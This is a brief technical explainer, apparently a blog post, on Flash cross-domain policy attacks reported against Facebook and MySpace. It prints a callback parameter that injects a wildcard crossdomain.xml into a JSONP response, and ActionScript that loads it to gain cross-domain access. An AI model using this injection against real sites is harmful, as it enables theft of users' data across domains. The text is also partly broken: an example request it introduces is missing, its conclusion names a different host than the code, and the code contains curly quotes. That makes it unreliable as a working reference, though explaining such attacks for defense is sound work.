Flash security policy attacks hit Facebook/MySpace... a techie look at what happened

Cross-domain policy files (crossdomain.xml) are forgivingly parsed by Flash. If an attacker can construct an HTTP request that results in the server sending back a policy file, then Flash will accept the policy file. For instance, imagine a university website that responds to a course listing request:


...with the following output:

<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>() {  return {name:”English101”, desc:”Read Books”}, {name:”Computers101”, desc:”play on computers”}};

Then one could load this policy via the following ActionScript? code:

System.security.loadPolicyFile("http://www.university.edu/CourseListing?format=json&callback=<cross-domain-policy>" + "<allow-access-from%20domain=\"*\"/></cross-domain-policy>”);

This results in the Flash application having complete cross-domain access to www.example.com.